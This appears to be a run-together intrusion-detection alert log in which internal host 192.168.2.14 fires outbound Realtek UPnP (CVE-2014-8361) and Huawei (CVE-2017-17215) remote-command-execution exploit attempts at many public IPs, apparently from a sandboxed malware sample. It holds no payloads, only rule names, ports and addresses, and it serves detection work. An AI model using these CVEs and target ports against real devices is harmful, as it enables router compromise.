                                                07/20/24-23:05:59.436745TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4146252869192.168.2.1431.38.158.120
                                                07/20/24-23:06:05.073224TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614924052869192.168.2.1486.5.139.220
                                                07/20/24-23:07:15.616106TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24621652869192.168.2.14133.45.19.120
                                                07/20/24-23:07:07.975226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5022852869192.168.2.1439.21.244.103
                                                07/20/24-23:05:59.290845TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613791252869192.168.2.14159.0.2.81
                                                07/20/24-23:05:58.237933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4026852869192.168.2.1466.132.67.191
                                                07/20/24-23:06:02.417792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4863052869192.168.2.1439.191.83.40
                                                07/20/24-23:06:18.671322TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615043052869192.168.2.1439.61.107.238
                                                07/20/24-23:07:23.347168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5525252869192.168.2.14212.254.128.30
                                                07/20/24-23:05:59.482880TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613366052869192.168.2.14113.35.97.192
                                                07/20/24-23:05:38.657431TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5466252869192.168.2.1462.112.120.41
                                                07/20/24-23:05:37.462705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5469252869192.168.2.14141.231.43.221
                                                07/20/24-23:05:39.557710TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5634252869192.168.2.14166.95.201.236
                                                07/20/24-23:05:58.216480TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614467052869192.168.2.14170.88.190.122
                                                07/20/24-23:06:24.662240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613680852869192.168.2.1495.76.201.76
                                                07/20/24-23:05:57.822070TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4132452869192.168.2.1478.180.137.61
                                                07/20/24-23:05:40.255397TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614517252869192.168.2.1499.151.162.57
                                                07/20/24-23:05:39.357380TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614252252869192.168.2.1490.16.174.124
                                                07/20/24-23:05:40.338978TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25023252869192.168.2.14144.25.238.160
                                                07/20/24-23:05:46.157384TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5087652869192.168.2.14198.39.44.17
                                                07/20/24-23:05:37.601961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4020652869192.168.2.1438.30.142.71
                                                07/20/24-23:05:34.627950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435637215192.168.2.1441.52.176.189
                                                07/20/24-23:05:35.319581TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615424052869192.168.2.14175.80.113.227
                                                07/20/24-23:05:38.426944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5913252869192.168.2.14154.203.201.18
                                                07/20/24-23:05:42.257817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543437215192.168.2.14219.110.127.52
                                                07/20/24-23:06:32.673677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5051252869192.168.2.1453.178.251.121
                                                07/20/24-23:05:40.341196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4206452869192.168.2.14146.54.173.69
                                                07/20/24-23:05:40.406154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4309052869192.168.2.14159.171.10.238
                                                07/20/24-23:06:09.934740TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5220852869192.168.2.144.160.29.45
                                                07/20/24-23:05:33.859779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357437215192.168.2.14157.42.169.126
                                                07/20/24-23:05:37.489725TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25887652869192.168.2.1491.85.138.225
                                                07/20/24-23:05:35.438296TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4835252869192.168.2.14183.106.204.162
                                                07/20/24-23:05:57.844842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4091652869192.168.2.1440.70.128.177
                                                07/20/24-23:06:12.244446TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615911652869192.168.2.14142.226.102.135
                                                07/20/24-23:05:37.475548TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25548452869192.168.2.1434.90.248.232
                                                07/20/24-23:05:35.283632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3972852869192.168.2.1481.143.140.223
                                                07/20/24-23:05:58.922584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3772452869192.168.2.141.173.175.109
                                                07/20/24-23:05:38.971654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485237215192.168.2.14197.107.17.120
                                                07/20/24-23:05:36.438620TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613667252869192.168.2.14211.88.161.89
                                                07/20/24-23:05:47.103906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984437215192.168.2.1441.240.51.232
                                                07/20/24-23:06:00.164569TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615672652869192.168.2.1487.172.32.236
                                                07/20/24-23:05:59.205784TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25712452869192.168.2.14129.196.243.121
                                                07/20/24-23:05:38.939891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041637215192.168.2.14197.8.166.28
                                                07/20/24-23:07:34.551915TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25273052869192.168.2.14179.254.24.143
                                                07/20/24-23:06:32.540944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4333852869192.168.2.1431.50.239.211
                                                07/20/24-23:05:48.112749TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3814452869192.168.2.1452.41.95.126
                                                07/20/24-23:06:00.164884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4418652869192.168.2.1473.67.230.39
                                                07/20/24-23:05:52.639265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25441252869192.168.2.14115.216.218.252
                                                07/20/24-23:05:58.709518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614914252869192.168.2.1412.142.133.82
                                                07/20/24-23:05:59.582686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614416452869192.168.2.1495.161.141.86
                                                07/20/24-23:05:45.068811TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4414052869192.168.2.1445.94.223.106
                                                07/20/24-23:06:38.756534TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5664452869192.168.2.14198.235.156.202
                                                07/20/24-23:05:58.592016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3456052869192.168.2.14156.132.102.218
                                                07/20/24-23:06:13.391443TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614012252869192.168.2.14170.229.88.222
                                                07/20/24-23:05:37.542495TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4944252869192.168.2.1465.119.53.40
                                                07/20/24-23:05:52.478142TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5192252869192.168.2.1452.57.110.73
                                                07/20/24-23:06:17.555463TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5777652869192.168.2.1470.60.168.25
                                                07/20/24-23:05:35.203581TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613304452869192.168.2.14157.223.126.25
                                                07/20/24-23:05:47.483839TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614179452869192.168.2.1434.35.146.155
                                                07/20/24-23:05:55.858612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998437215192.168.2.1441.69.233.87
                                                07/20/24-23:06:04.936056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23427852869192.168.2.1412.78.58.71
                                                07/20/24-23:05:52.557906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25034452869192.168.2.1414.207.98.101
                                                07/20/24-23:05:57.233976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613763252869192.168.2.1462.106.120.156
                                                07/20/24-23:05:59.330840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085452869192.168.2.14117.29.110.218
                                                07/20/24-23:05:39.770015TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5308252869192.168.2.1434.198.48.42
                                                07/20/24-23:05:58.747598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5021052869192.168.2.14198.11.216.157
                                                07/20/24-23:06:00.018219TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5357452869192.168.2.14160.151.2.40
                                                07/20/24-23:05:57.062143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5985252869192.168.2.14205.123.194.218
                                                07/20/24-23:05:57.457796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615626852869192.168.2.1484.76.117.61
                                                07/20/24-23:05:59.316014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613307052869192.168.2.14107.221.240.37
                                                07/20/24-23:06:20.681117TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615946852869192.168.2.1441.9.240.173
                                                07/20/24-23:06:04.266985TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3442252869192.168.2.1450.230.108.60
                                                07/20/24-23:05:39.055909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4336837215192.168.2.14172.164.177.95
                                                07/20/24-23:05:46.389614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5018252869192.168.2.1452.57.110.73
                                                07/20/24-23:05:46.526701TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4261052869192.168.2.14154.135.195.193
                                                07/20/24-23:05:50.533759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210637215192.168.2.1441.247.25.60
                                                07/20/24-23:06:03.345103TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614509652869192.168.2.14143.103.141.123
                                                07/20/24-23:05:36.374095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4706252869192.168.2.141.146.229.84
                                                07/20/24-23:06:05.678943TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5967252869192.168.2.1448.199.160.201
                                                07/20/24-23:05:56.993408TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613787252869192.168.2.149.153.76.157
                                                07/20/24-23:06:00.540716TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614837452869192.168.2.14171.203.207.215
                                                07/20/24-23:06:18.694960TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614471052869192.168.2.14135.207.31.104
                                                07/20/24-23:05:37.487251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3794052869192.168.2.1443.119.39.158
                                                07/20/24-23:05:52.545166TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5677652869192.168.2.1452.34.41.29
                                                07/20/24-23:05:57.587244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5068652869192.168.2.1496.167.251.238
                                                07/20/24-23:05:37.575243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5556252869192.168.2.14180.106.180.212
                                                07/20/24-23:05:56.120599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361637215192.168.2.14153.244.224.163
                                                07/20/24-23:05:48.795527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089437215192.168.2.14157.215.90.17
                                                07/20/24-23:05:46.740972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6077452869192.168.2.1486.103.97.76
                                                07/20/24-23:06:01.392409TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25925452869192.168.2.14219.4.1.236
                                                07/20/24-23:06:01.176373TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5453052869192.168.2.14131.196.248.38
                                                07/20/24-23:05:35.441643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4493852869192.168.2.14120.181.185.117
                                                07/20/24-23:05:39.777436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4648637215192.168.2.14147.153.145.70
                                                07/20/24-23:05:56.993065TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5580852869192.168.2.1438.177.215.154
                                                07/20/24-23:06:02.346541TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4558652869192.168.2.1440.244.169.7
                                                07/20/24-23:05:38.957923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660237215192.168.2.14197.146.253.34
                                                07/20/24-23:06:02.993689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3346252869192.168.2.14158.14.58.53
                                                07/20/24-23:05:38.553140TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615189052869192.168.2.1478.197.124.123
                                                07/20/24-23:05:58.383835TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25980452869192.168.2.14134.176.234.249
                                                07/20/24-23:06:14.487901TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5816052869192.168.2.14216.57.237.73
                                                07/20/24-23:06:27.237128TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615608652869192.168.2.1484.66.83.143
                                                07/20/24-23:06:00.099234TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23717652869192.168.2.14111.159.251.81
                                                07/20/24-23:05:33.830272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000837215192.168.2.14133.28.220.100
                                                07/20/24-23:05:35.267339TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613403252869192.168.2.1441.109.181.54
                                                07/20/24-23:05:58.253105TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3783052869192.168.2.1476.195.229.149
                                                07/20/24-23:06:05.200381TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615699452869192.168.2.14172.129.77.75
                                                07/20/24-23:06:18.458631TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613378852869192.168.2.14109.168.44.251
                                                07/20/24-23:05:44.341577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288052869192.168.2.1485.190.99.234
                                                07/20/24-23:06:32.735165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25536452869192.168.2.1457.38.35.10
                                                07/20/24-23:06:12.531607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616061052869192.168.2.1459.102.173.92
                                                07/20/24-23:07:06.909872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5122452869192.168.2.14212.62.223.235
                                                07/20/24-23:05:37.524280TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23897852869192.168.2.14145.195.83.181
                                                07/20/24-23:05:48.066624TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4474652869192.168.2.14105.215.161.3
                                                07/20/24-23:05:58.154497TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615059452869192.168.2.14186.26.42.76
                                                07/20/24-23:06:51.240850TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615687452869192.168.2.1467.39.83.201
                                                07/20/24-23:05:37.440253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5733652869192.168.2.14176.224.174.174
                                                07/20/24-23:05:45.125189TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615715452869192.168.2.1419.168.69.174
                                                07/20/24-23:06:01.290865TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23529452869192.168.2.1427.99.183.157
                                                07/20/24-23:05:47.365340TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615538852869192.168.2.1414.188.62.21
                                                07/20/24-23:05:58.240695TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23509252869192.168.2.14155.70.176.109
                                                07/20/24-23:05:40.333807TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5710652869192.168.2.14168.22.240.103
                                                07/20/24-23:06:11.296188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613344252869192.168.2.14134.6.131.96
                                                07/20/24-23:05:52.628611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4322052869192.168.2.14137.223.238.217
                                                07/20/24-23:06:24.516178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3414052869192.168.2.1471.238.208.128
                                                07/20/24-23:05:56.807816TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614905052869192.168.2.1459.6.13.116
                                                07/20/24-23:06:33.055161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5831052869192.168.2.1473.142.231.64
                                                07/20/24-23:06:39.662031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5244452869192.168.2.14161.82.139.62
                                                07/20/24-23:07:23.347168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613594852869192.168.2.14117.127.16.156
                                                07/20/24-23:05:37.450149TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24598052869192.168.2.14158.68.165.132
                                                07/20/24-23:05:57.024016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3461052869192.168.2.14153.114.31.182
                                                07/20/24-23:05:45.357082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246437215192.168.2.1464.198.94.103
                                                07/20/24-23:05:45.439166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050837215192.168.2.1441.2.150.17
                                                07/20/24-23:06:03.593241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5987252869192.168.2.1464.186.245.47
                                                07/20/24-23:05:39.898156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4616652869192.168.2.14183.13.10.198
                                                07/20/24-23:05:48.777005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586637215192.168.2.1476.72.52.30
                                                07/20/24-23:06:01.695131TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25094452869192.168.2.1451.105.4.160
                                                07/20/24-23:06:47.739427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5346652869192.168.2.1480.122.195.116
                                                07/20/24-23:05:57.111519TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25450852869192.168.2.14111.19.143.182
                                                07/20/24-23:05:58.356121TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23748452869192.168.2.14210.180.35.0
                                                07/20/24-23:05:59.171818TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614271852869192.168.2.1453.70.52.187
                                                07/20/24-23:05:52.633204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5060452869192.168.2.14164.86.63.183
                                                07/20/24-23:05:57.934535TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615592452869192.168.2.14206.48.160.223
                                                07/20/24-23:06:05.488342TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3653452869192.168.2.14135.37.186.112
                                                07/20/24-23:05:57.143736TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23394252869192.168.2.14180.234.239.68
                                                07/20/24-23:05:55.858612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5737637215192.168.2.14157.156.192.87
                                                07/20/24-23:06:23.359635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5097652869192.168.2.14120.240.88.154
                                                07/20/24-23:05:38.569152TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615215052869192.168.2.1412.251.167.176
                                                07/20/24-23:05:33.859779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387837215192.168.2.14197.52.105.112
                                                07/20/24-23:05:42.221844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878037215192.168.2.14197.208.99.114
                                                07/20/24-23:05:45.414465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839437215192.168.2.14197.15.176.228
                                                07/20/24-23:05:36.325898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935437215192.168.2.1441.52.157.191
                                                07/20/24-23:07:28.197579TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614573852869192.168.2.1492.219.216.50
                                                07/20/24-23:07:19.727778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5352252869192.168.2.14177.234.19.81
                                                07/20/24-23:06:11.138961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4356052869192.168.2.14179.227.5.10
                                                07/20/24-23:05:40.369944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5032852869192.168.2.14210.179.176.183
                                                07/20/24-23:06:14.422743TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3627052869192.168.2.1474.205.40.173
                                                07/20/24-23:05:52.493434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4957052869192.168.2.1420.25.130.127
                                                07/20/24-23:06:33.055161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4156052869192.168.2.14147.154.255.30
                                                07/20/24-23:06:10.357307TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4071252869192.168.2.14162.172.126.29
                                                07/20/24-23:05:35.971073TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614690252869192.168.2.14114.248.35.135
                                                07/20/24-23:05:47.333295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3295252869192.168.2.1417.203.0.123
                                                07/20/24-23:06:00.139140TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23655252869192.168.2.14162.167.107.129
                                                07/20/24-23:06:04.058070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386037215192.168.2.14157.134.20.79
                                                07/20/24-23:05:52.450049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5831652869192.168.2.1418.33.95.3
                                                07/20/24-23:05:39.754007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5908637215192.168.2.14157.83.85.147
                                                07/20/24-23:06:00.134392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24967052869192.168.2.14109.36.201.204
                                                07/20/24-23:05:39.384181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3365452869192.168.2.14102.139.81.245
                                                07/20/24-23:05:35.962602TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616029852869192.168.2.14183.119.35.244
                                                07/20/24-23:05:50.554912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905437215192.168.2.14197.205.96.85
                                                07/20/24-23:06:00.444049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4705052869192.168.2.1482.244.199.195
                                                07/20/24-23:05:38.944157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033237215192.168.2.1441.236.232.24
                                                07/20/24-23:05:36.235094TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613425452869192.168.2.1417.92.216.196
                                                07/20/24-23:06:03.387430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650437215192.168.2.14108.187.236.148
                                                07/20/24-23:06:11.978005TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615676452869192.168.2.1434.74.79.94
                                                07/20/24-23:06:08.337396TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4619852869192.168.2.14200.186.146.236
